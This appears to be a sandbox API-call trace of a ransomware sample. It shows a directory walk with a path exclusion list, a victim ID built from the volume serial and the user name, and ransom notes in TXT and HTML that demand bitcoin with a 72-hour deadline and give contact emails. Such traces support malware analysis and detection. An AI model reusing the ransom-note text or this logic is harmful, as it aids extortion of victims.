	[0158.919] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0158.919] CloseHandle (hObject=0x384) returned 1
	[0158.919] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x783c99ba, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x783f0278, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0158.920] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\*.*") returned 43
	[0158.920] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.920] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\*.*", cchLength=0x2b | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\*.*") returned 0x2b
	[0158.920] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.921] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="windows") returned 0x0
	[0158.921] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.921] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="boot") returned 0x0
	[0158.921] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.921] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="system volume information") returned 0x0
	[0158.921] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.922] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0158.922] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.922] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="temp") returned 0x0
	[0158.922] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.922] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="program files") returned 0x0
	[0158.922] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.923] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="program files (x86)") returned 0x0
	[0158.923] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.923] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="appdata") returned 0x0
	[0158.923] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.923] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="application data") returned 0x0
	[0158.923] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.924] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="winnt") returned 0x0
	[0158.924] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.924] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="tmp") returned 0x0
	[0158.924] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.924] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="cache") returned 0x0
	[0158.924] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.925] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="temporary internet files") returned 0x0
	[0158.925] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.925] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="webcache") returned 0x0
	[0158.925] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.925] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="inetcache") returned 0x0
	[0158.925] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.925] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="nvidia") returned 0x0
	[0158.926] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.926] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="packages") returned 0x0
	[0158.926] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.926] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="cookies") returned 0x0
	[0158.926] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.926] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\*.*", lpSrch="programdata") returned 0x0
	[0158.927] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0158.927] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0158.927] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x783c99ba, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x783f0278, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0158.927] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0158.927] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b641eb6, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b641eb6, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4BAD322A-C043-4DED-A97A-6FE0C4412FBE", cAlternateFileName="4BAD32~1")) returned 1
	[0158.927] lstrcmpW (lpString1="4BAD322A-C043-4DED-A97A-6FE0C4412FBE", lpString2="..") returned 1
	[0158.927] lstrcmpW (lpString1="4BAD322A-C043-4DED-A97A-6FE0C4412FBE", lpString2=".") returned 1
	[0158.927] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun"
	[0158.928] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\"
	[0158.928] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\", lpString2="4BAD322A-C043-4DED-A97A-6FE0C4412FBE" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE"
	[0158.928] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE"
	[0158.928] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\"
	[0158.928] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\"
	[0158.928] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\*.*"
	[0158.928] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b641eb6, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b641eb6, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0158.936] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\*.*") returned 80
	[0158.936] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.936] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\*.*", cchLength=0x50 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*") returned 0x50
	[0158.936] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.937] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="windows") returned 0x0
	[0158.937] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.937] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="boot") returned 0x0
	[0158.937] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.937] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="system volume information") returned 0x0
	[0158.937] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.937] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0158.938] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.938] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="temp") returned 0x0
	[0158.938] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.938] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="program files") returned 0x0
	[0158.938] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.938] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="program files (x86)") returned 0x0
	[0158.938] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.939] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="appdata") returned 0x0
	[0158.939] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.939] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="application data") returned 0x0
	[0158.939] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.939] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="winnt") returned 0x0
	[0158.939] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.940] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="tmp") returned 0x0
	[0158.940] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.940] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="cache") returned 0x0
	[0158.940] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.940] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="temporary internet files") returned 0x0
	[0158.940] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.941] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="webcache") returned 0x0
	[0158.941] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.941] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="inetcache") returned 0x0
	[0158.941] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.941] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="nvidia") returned 0x0
	[0158.941] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.941] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="packages") returned 0x0
	[0158.942] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.942] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="cookies") returned 0x0
	[0158.942] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.942] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="programdata") returned 0x0
	[0158.942] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b641eb6, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b641eb6, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0158.943] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b5f5640, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b5f5640, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-us.16", cAlternateFileName="")) returned 1
	[0158.943] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b5f5640, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b641eb6, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b641eb6, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x-none.16", cAlternateFileName="")) returned 1
	[0158.943] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b5f5640, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b641eb6, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b641eb6, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x-none.16", cAlternateFileName="")) returned 0
	[0158.943] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0158.948] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0158.949] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE"
	[0158.949] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\*.*"
	[0158.949] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.950] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.950] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\HELP_DECRYPT_YOUR_FILES.TXT") returned 104
	[0158.950] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0158.953] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0158.953] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0158.957] CloseHandle (hObject=0x388) returned 1
	[0158.957] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.958] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.958] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0158.959] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0158.960] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0158.960] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0158.960] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0158.960] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0158.961] CloseHandle (hObject=0x388) returned 1
	[0158.961] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.961] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.962] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0158.962] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\HELP_DECRYPT_YOUR_FILES.HTML") returned 105
	[0158.962] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0158.962] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0158.963] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0158.967] CloseHandle (hObject=0x388) returned 1
	[0158.967] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0158.968] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.968] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.968] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0158.969] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0158.970] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0158.970] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
